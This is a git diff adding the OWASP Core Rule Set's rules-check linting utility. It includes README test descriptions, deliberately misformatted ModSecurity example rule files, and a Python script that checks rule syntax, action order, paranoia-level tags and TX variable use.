+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920160,\
+ phase:1,\
+ block,\
+ t:none,\
+ tag:'paranoia-level/2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920161,\
+ phase:1,\
+ block,\
+ t:none,\
+ tag:'paranoia-level/1',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920162,\
+ phase:1,\
+ block,\
+ t:none,\
+ tag:'paranoia-level/1',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+
+```
+
+In this rule file, there are more problems:
+* rule 920160 is activated on PL1, but the `tag` value is PL2
+* at rule 920160, the TX variable gets error_anomaly_score, but the severity is CRITICAL
+* at rule 920161 there is no severity action
+* rule 920162 increments anomaly_score_pl2, but it's in PL1
+
+```
+$ ./rules-check.py -r examples/test8.conf
+Config file: examples/test8.conf
+ Parsing ok.
+Checking parsed rules...
+examples/test8.conf
+ Ignore case check ok.
+ Action order check ok.
+ Indentation check ok.
+ 'ctl:auditLogParts' actions are in right place.
+ no duplicate id's
+ Found incorrect paranoia-level/N tag(s)
+ file=examples/test8.conf, line=34, endLine=34, title=wrong or missing paranoia-level/N tag: tag 'paranoia-level/2' on PL 1, rule id: 920160
+ Found incorrect (inbound|outbout)_anomaly_score value(s)
+ file=examples/test8.conf, line=36, endLine=36, title=wrong (inbound|outbout)_anomaly_score variable or value: invalid value for anomaly_score_pl1: tx.error_anomaly_score with severity critical, rule id: 920160
+ file=examples/test8.conf, line=44, endLine=44, title=wrong (inbound|outbout)_anomaly_score variable or value: missing severity action, rule id: 920161
+ file=examples/test8.conf, line=53, endLine=53, title=wrong (inbound|outbout)_anomaly_score variable or value: variable inbound_anomaly_score_pl2 on PL 1, rule id: 920162
+ There are one or more unset TX variables.
+ file=examples/test8.conf, line=53, endLine=53, title=unset TX variable: TX variable 'critical_anomaly_score' not set / later set (rvar) in rule 920162
+End of checking parsed rules
+Cumulated report about unused TX variables
+ No unused TX variable
+$ echo $?
+1
+```
+
+### Test 9 - check state of used TX variables
+
+
+```
+SecRule TX:foo "@rx bar" \
+ "id:1001,\
+ phase:1,\
+ pass,\
+ nolog"
+
+SecRule ARGS "@rx ^.*$" \
+ "id:1002,\
+ phase:1,\
+ pass,\
+ nolog,\
+ setvar:tx.bar=1"
+```
+
+In this rule file, there are more problems:
+* rule 1001 used an uninitialized variable (`TX:foo`)
+* rule 1002 sets a TX variable which never used
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/TODO.txt b/nginx/config/owasp-crs/util/crs-rules-check/TODO.txt
new file mode 100644
index 00000000..578a70d6
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/TODO.txt
@@ -0,0 +1,5 @@
+
+* Add more checks
+ * check 'mandatory' actions, eg. `phase`
+ * check existing of necessary `tag`, eg. `OWASP_CRS/$$VER$$`
+ * check existing of `ver` action
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test1.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test1.conf
new file mode 100644
index 00000000..3366b13a
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test1.conf
@@ -0,0 +1,10 @@
+SecRule &ARGS_GET "@eq 3" \
+ "id:1,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain
+ SecRule ARGS_GET:foo "@rx bar" \
+ "t:none,t:urlDecodeUni,t:lowercase,\
+ setvar:'tx.some_vars=1'
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test2.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test2.conf
new file mode 100644
index 00000000..7b7d4eab
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test2.conf
@@ -0,0 +1,6 @@
+SecRule REQUEST_URI "@beginswith /index.php" \
+ "id:1,\
+ phase:1,\
+ deny,\
+ t:none,\
+ nolog"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test3.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test3.conf
new file mode 100644
index 00000000..2cd9d44e
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test3.conf
@@ -0,0 +1,6 @@
+SecRule REQUEST_URI "@beginsWith /index.php" \
+ "phase:1,\
+ id:1,\
+ deny,\
+ t:none,\
+ nolog"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test4.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test4.conf
new file mode 100644
index 00000000..00bc8374
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test4.conf
@@ -0,0 +1,17 @@
+ SecRule ARGS "@rx foo" \
+ "id:1,\
+ phase:1,\
+ pass,\
+ nolog"
+
+SecRule ARGS "@rx foo" \
+ "id:2,\
+ phase:1,\
+ pass,\
+ nolog"
+
+SecRule ARGS "@rx foo" \
+ "id:3,\
+ phase:1,\
+ pass,\
+ nolog"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test5.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test5.conf
new file mode 100644
index 00000000..22638f34
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test5.conf
@@ -0,0 +1,6 @@
+SecRule REQUEST_URI "index.php" \
+ "id:1,\
+ phase:1,\
+ deny,\
+ t:none,\
+ nolog"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test6.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test6.conf
new file mode 100644
index 00000000..63f6c9fe
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test6.conf
@@ -0,0 +1,7 @@
+SecRule ARGS "@rx attack" \
+ "id:1,\
+ phase:4,\
+ block,\
+ capture,\
+ t:none,\
+ ctl:auditLogParts=+E"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test7.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test7.conf
new file mode 100644
index 00000000..40530136
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test7.conf
@@ -0,0 +1,14 @@
+
+SecRule ARGS "@rx foo" \
+ "id:1001,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none"
+
+SecRule ARGS_NAMES "@rx bar" \
+ "id:1001,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test8.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test8.conf
new file mode 100644
index 00000000..bd54046b
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test8.conf
@@ -0,0 +1,56 @@
+
+SecRule &TX:blocking_paranoia_level "@eq 0" \
+ "id:901120,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc1',\
+ setvar:'tx.blocking_paranoia_level=1'"
+
+SecRule &TX:detection_paranoia_level "@eq 0" \
+ "id:901125,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc1',\
+ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
+
+SecRule &TX:error_anomaly_score "@eq 0" \
+ "id:901141,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc1',\
+ setvar:'tx.error_anomaly_score=4'"
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920160,\
+ phase:1,\
+ block,\
+ t:none,\
+ tag:'paranoia-level/2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920161,\
+ phase:1,\
+ block,\
+ t:none,\
+ tag:'paranoia-level/1',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
+
+SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
+ "id:920162,\
+ phase:1,\
+ block,\
+ t:none,\
+ tag:'paranoia-level/1',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test9.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test9.conf
new file mode 100644
index 00000000..d81d69fa
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test9.conf
@@ -0,0 +1,13 @@
+
+SecRule TX:foo "@rx bar" \
+ "id:1001,\
+ phase:1,\
+ pass,\
+ nolog"
+
+SecRule ARGS "@rx ^.*$" \
+ "id:1002,\
+ phase:1,\
+ pass,\
+ nolog,\
+ setvar:tx.bar=1"
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/requirements.txt b/nginx/config/owasp-crs/util/crs-rules-check/requirements.txt
new file mode 100644
index 00000000..a9894876
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/requirements.txt
@@ -0,0 +1 @@
+msc-pyparser>=1.2.1
diff --git a/nginx/config/owasp-crs/util/crs-rules-check/rules-check.py b/nginx/config/owasp-crs/util/crs-rules-check/rules-check.py
new file mode 100755
index 00000000..1a4384a4
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs-rules-check/rules-check.py
@@ -0,0 +1,889 @@ +#!/usr/bin/env python3 + +import sys +import os +import glob +import msc_pyparser +import difflib +import argparse +import re + +oformat = "native" + +class Check(object): + def __init__(self, data, txvars): + + # txvars is a global used hash table, but processing of rules is a sequential flow + # all rules need this global table + self.globtxvars = txvars + # list available operators, actions, transformations and ctl args + self.operators = "beginsWith|containsWord|contains|detectSQLi|detectXSS|endsWith|eq|fuzzyHash|geoLookup|ge|gsbLookup|gt|inspectFile|ipMatch|ipMatchF|ipMatchFromFile|le|lt|noMatch|pmFromFile|pmf|pm|rbl|rsub|rx|streq|strmatch|unconditionalMatch|validateByteRange|validateDTD|validateHash|validateSchema|validateUrlEncoding|validateUtf8Encoding|verifyCC|verifyCPF|verifySSN|within".split("|") + self.operatorsl = [o.lower() for o in self.operators] + self.actions = "accuracy|allow|append|auditlog|block|capture|chain|ctl|deny|deprecatevar|drop|exec|expirevar|id|initcol|logdata|log|maturity|msg|multiMatch|noauditlog|nolog|pass|pause|phase|prepend|proxy|redirect|rev|sanitiseArg|sanitiseMatched|sanitiseMatchedBytes|sanitiseRequestHeader|sanitiseResponseHeader|setenv|setrsc|setsid|setuid|setvar|severity|skipAfter|skip|status|tag|t|ver|xmlns".split("|") + self.actionsl = [a.lower() for a in self.actions] + self.transforms = "base64DecodeExt|base64Decode|base64Encode|cmdLine|compressWhitespace|cssDecode|escapeSeqDecode|hexDecode|hexEncode|htmlEntityDecode|jsDecode|length|lowercase|md5|none|normalisePathWin|normalisePath|normalizePathWin|normalizePath|parityEven7bit|parityOdd7bit|parityZero7bit|removeCommentsChar|removeComments|removeNulls|removeWhitespace|replaceComments|replaceNulls|sha1|sqlHexDecode|trimLeft|trimRight|trim|uppercase|urlDecodeUni|urlDecode|urlEncode|utf8toUnicode".split("|") + self.transformsl = [t.lower() for t in self.transforms] + self.ctls = 
"auditEngine|auditLogParts|debugLogLevel|forceRequestBodyVariable|hashEnforcement|hashEngine|requestBodyAccess|requestBodyLimit|requestBodyProcessor|responseBodyAccess|responseBodyLimit|ruleEngine|ruleRemoveById|ruleRemoveByMsg|ruleRemoveByTag|ruleRemoveTargetById|ruleRemoveTargetByMsg|ruleRemoveTargetByTag".split("|") + self.ctlsl = [c.lower() for c in self.ctls] + + # list the actions in expected order + # see wiki: https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Order-of-ModSecurity-Actions-in-CRS-rules + # note, that these tokens are with lovercase here, but used only for to check the order + self.ordered_actions = [ + "id", # 0 + "phase", # 1 + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", # 10 + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitisearg", + "sanitiserequestheader", # 20 + "sanitisematched", + "sanitisematchedbytes", + "ctl", + "ver", + "severity", + "multimatch", + "initcol", + "setenv", + "setvar", + "expirevar", # 30 + "chain", + "skip", + "skipafter", + ] + + self.data = data # holds the parsed data + self.current_ruleid = 0 # holds the rule id + self.curr_lineno = 0 # current line number + self.chained = False # holds the chained flag + self.caseerror = [] # list of case mismatch errors + self.orderacts = [] # list of ordered action errors + self.auditlogparts = [] # list of wrong ctl:auditLogParts + self.undef_txvars = [] # list of undefined TX variables + self.pltags = [] # list of incosistent PL tags + self.plscores = [] # list of incosistent PL scores + self.dupes = [] # list of duplicated id's + self.ids = {} # list of rule id's + + self.re_tx_var = re.compile("%\{\}") + + def store_error(self, msg): + # store the error msg in the list + self.caseerror.append({ + 'ruleid' : 0, + 'line' : self.curr_lineno, + 'endLine': self.curr_lineno, + 'message': msg + }) + + def check_ignore_case(self): + # check the ignore cases at operators, 
actions, + # transformations and ctl arguments + for d in self.data: + if "actions" in d: + aidx = 0 # index of action in list + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + a = d['actions'][aidx] # 'a' is the action from the list + + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + if a['act_name'] == "chain": + self.chained = True + + # check the action is valid + if a['act_name'].lower() not in self.actionsl: + self.store_error("Invalid action", a['act_name']) + # check the action case sensitive format + if self.actions[self.actionsl.index(a['act_name'].lower())] != a['act_name']: + self.store_error("Action case mismatch: %s" % a['act_name']) + + if a['act_name'] == 'ctl': + # check the ctl argument is valid + if a['act_arg'].lower() not in self.ctlsl: + self.store_error("Invalid ctl", a['act_arg']) + # check the ctl argument case sensitive format + if self.ctls[self.ctlsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Ctl case mismatch: %s" % a['act_arg']) + if a['act_name'] == 't': + # check the transform is valid + if a['act_arg'].lower() not in self.transformsl: + self.store_error("Invalid transform: %s" % a['act_arg']) + # check the transform case sensitive format + if self.transforms[self.transformsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Transform case mismatch : %s" % a['act_arg']) + aidx += 1 + if "operator" in d and d["operator"] != "": + self.curr_lineno = d['oplineno'] + # strip the operator + op = d['operator'].replace("!", "").replace("@", "") + # check the operator is valid + if op.lower() not in self.operatorsl: + self.store_error("Invalid operator: %s" % d['operator']) + # check the operator case sensitive format + if self.operators[self.operatorsl.index(op.lower())] != op: + self.store_error("Operator case mismatch: %s" % d['operator']) + else: + if d['type'].lower() == 
"secrule": + self.curr_lineno = d['lineno'] + self.store_error("Empty operator isn't allowed") + if self.current_ruleid > 0: + for e in self.caseerror: + e['ruleid'] = self.current_ruleid + e['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_action_order(self): + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + max_order = 0 # maximum position of read actions + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if chained + if a['act_name'] == "chain": + self.chained = True + + # get the index of action from the ordered list + # above from constructor + try: + act_idx = self.ordered_actions.index(a['act_name'].lower()) + except ValueError: + print("ERROR: '%s' not in actions list!" 
% (a['act_name'])) + sys.exit(-1) + + # if the index of current action is @ge than the previous + # max value, load it into max_order + if act_idx >= max_order: + max_order = act_idx + else: + # prevact is the previous action's position in list + # act_idx is the current action's position in list + # if the prev is @gt actually, means it's at wrong position + if self.ordered_actions.index(prevact) > act_idx: + self.orderacts.append({ + 'ruleid' : 0, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "action '%s' at pos %d is wrong place against '%s' at pos %d" % (prevact, pidx, a['act_name'], aidx,) + }) + prevact = a['act_name'].lower() + pidx = aidx + aidx += 1 + for a in self.orderacts: + if a['ruleid'] == 0: + a['ruleid'] = self.current_ruleid + a['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_ctl_audit_log(self): + """check there is no ctl:auditLogParts action in any rules""" + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if action is ctl:auditLogParts + if a['act_name'].lower() == "ctl" and a['act_arg'].lower() == "auditlogparts": + self.auditlogparts.append({ + 'ruleid' : self.current_ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "" + }) + + aidx += 1 + + def collect_tx_variable(self, fname): + """collect TX variables in rules + this function collects the TX variables at rules, + if the variable is at a 'setvar' action's left side, eg + setvar:tx.foo=bar + + Because this rule called before any other check, + additionally it checks the duplicated rule ID + """ + chained = False + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + if chained == False: + ruleid = 0 # ruleid + phase = 2 # works 
only in Apache, libmodsecurity uses default phase 1 + else: + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if ruleid in self.ids: + self.dupes.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "id %d is duplicated, previous place: %s:%d" % (ruleid, self.ids[ruleid]['fname'], self.ids[ruleid]['lineno']) + }) + else: + self.ids[ruleid] = {'fname': fname, 'lineno': a['lineno']} + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() + # set TX variable if there is no such key + # OR + # key exists but the existing struct's phase is higher + if (txv[0] not in self.globtxvars or self.globtxvars[txv[0]]['phase'] > phase) and \ + not re.search("%\{[^%]+\}", txv[0]): + self.globtxvars[txv[0]] = { + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : a['lineno'], + 'endLine': a['lineno'] + } + else: + pass + aidx += 1 + + def check_tx_variable(self, fname): + """this function checks if a used TX variable has set + + a variable is used when: + * it's an operator argument: "@rx %{TX.foo}" + * it's a target: SecRule TX.foo "@..." 
+ * it's a right side value in a value giving: setvar:tx.bar=tx.foo + + this function collects the variables if it is used but not set previously + """ + check_exists = None # set if rule checks the existence of varm eg `&TX:foo "@eq 1"` + has_disruptive = False # set if rule contains disruptive action + chained = False + for d in self.data: + if d['type'].lower() in ["secrule", "secaction"]: + aidx = 0 # stores the index of current action + if chained == False: + phase = 2 # works only in Apache, libmodsecurity uses default phase 1 + ruleid = 0 + else: + chained = False + + # iterate over actions and collect these values: + # ruleid, phase, chained, rule has or not any disruptive action + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] in ['block', 'deny', 'drop', 'allow', 'proxy', 'redirect']: + has_disruptive = True + + # check wheter tx.var is used at setvar's right side + val_act = [] + val_act_arg = [] + # example: + # setvar:'tx.inbound_anomaly_score_threshold=5' + # + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + # example2 (same as above, but no single quotes!): + # setvar:tx.inbound_anomaly_score_threshold=5 + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + if "act_arg" in a and a['act_arg'] is not None: + val_act = re.findall("%\{(tx.[^%]*)\}", a['act_arg'], re.I) + if "act_arg_val" in a and a['act_arg_val'] is not None: + val_act_arg = re.findall("%\{(tx.[^%]*)\}", a['act_arg_val'], re.I) + for v in val_act + val_act_arg: + v = v.lower().replace("tx.", "") + # check whether the variable is a captured var, eg TX.1 - we do not care that case + if not re.match("^\d$", v, re.I): + # v holds the tx.ANY variable, but not the captured ones + # we should collect these variables + if (v not 
in self.globtxvars or phase < self.globtxvars[v]['phase']): + self.undef_txvars.append({ + 'var' : v, + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "TX variable '%s' not set / later set (rvar) in rule %d" % (v, ruleid) + }) + else: + self.globtxvars[v]['used'] = True + else: + if v in self.globtxvars: + self.globtxvars[v]['used'] = True + aidx += 1 + + if "operator_argument" in d: + oparg = re.findall("%\{(tx.[^%]*)\}", d['operator_argument'], re.I) + if oparg: + for o in oparg: + o = o.lower() + o = re.sub("tx\.", "", o, re.I) + if (o not in self.globtxvars or phase < self.globtxvars[o]['phase']) and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o) and \ + check_exists is None: + self.undef_txvars.append({ + 'var' : o, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (OPARG) in rule %d" % (o, ruleid) + }) + elif o in self.globtxvars and phase >= self.globtxvars[o]['phase'] and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o): + self.globtxvars[o]['used'] = True + if "variables" in d: + for v in d['variables']: + # check if the variable is TX and has not a & prefix, which counts + # the variable length + if v['variable'].lower() == "tx": + if v['counter'] != True: + # * if the variable part (after '.' 
or ':') is not there in + # the list of collected TX variables, and + # * not a numeric, eg TX:2, and + # * not a regular expression, between '/' chars, eg TX:/^foo/ + # OR + # * rule's phase lower than declaration's phase + rvar = v['variable_part'].lower() + if (rvar not in self.globtxvars or (ruleid != self.globtxvars[rvar]['ruleid'] and phase < self.globtxvars[rvar]['phase'])) and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.undef_txvars.append({ + 'var' : rvar, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (VAR)" % (v['variable_part']) + }) + elif rvar in self.globtxvars and phase >= self.globtxvars[rvar]['phase'] and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.globtxvars[rvar]['used'] = True + else: + check_exists = True + self.globtxvars[v['variable_part'].lower()] = { + 'var' : v['variable_part'].lower(), + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : d['lineno'], + 'endLine': d['lineno'] + } + if has_disruptive == True: + self.globtxvars[v['variable_part'].lower()]['used'] = True + if len(self.undef_txvars) > 0 and self.undef_txvars[-1]['var'] == v['variable_part'].lower(): + del(self.undef_txvars[-1]) + if chained == False: + check_exists = None + has_disruptive = False + + def check_pl_consistency(self): + """this method checks the PL consistency + + the function iterates through the rules, and catches the set PL, eg: + + SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" ... 
+ this means we are on PL1 currently + + all rules must consist with current PL at the used tags and variables + + eg: + tag:'paranoia-level/1' + ^ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + ^^^ + additional relations: + * all rules must have the "tag:'paranoia-level/N'" if it does not have "nolog" action + * if rule have "nolog" action it must not have "tag:'paranoia-level/N'" action + * anomaly scoring value on current PL must increment by value corresponding to severity + + """ + curr_pl = 0 + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # nolog action exists + + for d in self.data: + # find the current PL + if d['type'].lower() in ["secrule"]: + for v in d['variables']: + if v['variable'].lower() == "tx" and \ + v['variable_part'].lower() == "detection_paranoia_level" and \ + d['operator'] == "@lt" and re.match("^\d$", d['operator_argument']): + curr_pl = int(d['operator_argument']) + + if "actions" in d: + aidx = 0 # stores the index of current action + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "severity": + severity = a['act_arg'].replace("'", "").lower() + if a['act_name'] == "tag": + tags.append(a) + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + # this hack necessary, because sometimes we use setvar argument + # between '', sometimes not + # eg + # setvar:crs_setup_version=334 + # setvar:'tx.inbound_anomaly_score_threshold=5' + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() # variable name + if len(txv) > 1: + txv[1] = txv[1].lower().strip("+\{\}") # variable value + else: + txv.append(a['act_arg_val'].strip("+\{\}")) + _txvars[txv[0]] = txv[1] + _txvlines[txv[0]] = a['lineno'] + if a['act_name'] == "nolog": + has_nolog = True + if 
a['act_name'] == "chain": + chained = True + aidx += 1 + + has_pl_tag = False + for a in tags: + if a['act_arg'][0:14] == "paranoia-level": + has_pl_tag = True + pltag = int(a['act_arg'].split("/")[1]) + if has_nolog: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' with 'nolog' action, rule id: %d" % (a['act_arg'], ruleid) + }) + elif pltag != curr_pl and curr_pl > 0: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' on PL %d, rule id: %d" % (a['act_arg'], curr_pl, ruleid) + }) + + if has_pl_tag != True and has_nolog == False and curr_pl >= 1: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "rule does not have `paranoia-level/%d` action, rule id: %d" % (curr_pl, ruleid) + }) + + for t in _txvars: + subst_val = re.search("%{tx.[a-z]+_anomaly_score}", _txvars[t], re.I) + val = re.sub("[\+\%\{\}]", "", _txvars[t]).lower() + scorepl = re.search("anomaly_score_pl\d$", t) # check if last char is a numeric, eg ...anomaly_score_pl1 + if scorepl: + if curr_pl > 0 and int(t[-1]) != curr_pl: + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "variable %s on PL %d, rule id: %d" % (t, curr_pl, ruleid) + }) + if severity is None and subst_val: # - do we need this? 
+ self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "missing severity action, rule id: %d" % (ruleid) + }) + else: + if val != 'tx.%s_anomaly_score' % (severity) and val != "0": + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "invalid value for anomaly_score_pl%d: %s with severity %s, rule id: %d" % (int(t[-1]), val, severity, ruleid) + }) + # variable has found so we need to mark it as used + self.globtxvars[t]['used'] = True + + # reset local variables if we are done with a rule <==> no more 'chain' action + if chained == False: + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # rule has nolog action + +def remove_comments(data): + """ + In some special cases, remove the comments from the beginning of the lines. + + A special case starts when the line has a "SecRule" or "SecAction" token at + the beginning and ends when the line - with or without a comment - is empty. 
+ + Eg.: + 175 # Uncomment this rule to change the default: + 176 # + 177 #SecAction \ + 178 # "id:900000,\ + 179 # phase:1,\ + 180 # pass,\ + 181 # t:none,\ + 182 # nolog,\ + 183 # setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + In this case, the comments from the beginning of lines 177 and 183 are deleted and + evaluated as follows: + + 175 # Uncomment this rule to change the default: + 176 # + 177 SecAction \ + 178 "id:900000,\ + 179 phase:1,\ + 180 pass,\ + 181 t:none,\ + 182 nolog,\ + 183 setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + """ + _data = [] # new structure by lines + lines = data.split("\n") + marks = re.compile("^#(| *)(SecRule|SecAction)", re.I) # regex what catches the rules + state = 0 # hold the state of the parser + for l in lines: + # if the line starts with #SecRule, #SecAction, # SecRule, # SecAction, set the marker + if marks.match(l): + state = 1 + # if the marker is set and the line is empty or contains only a comment, unset it + if state == 1 and l.strip() in ["", "#"]: + state = 0 + + # if marker is set, remove the comment + if state == 1: + _data.append(re.sub("^#", "", l)) + else: + _data.append(l) + + data = "\n".join(_data) + + return data + +def errmsg(msg): + if oformat == "github": + print("::error %s" % (msg)) + else: + print(msg) + +def errmsgf(msg): + if oformat == "github": + if 'message' in msg and msg['message'].strip() != "": + print("::error%sfile={file},line={line},endLine={endLine},title={title}: {message}".format(**msg) % (msg['indent']*" ")) + else: + print("::error%sfile={file},line={line},endLine={endLine},title={title}".format(**msg) % (msg['indent']*" ")) + else: + if 'message' in msg and msg['message'].strip() != "": + print("%sfile={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg) % (msg['indent']*" ")) 
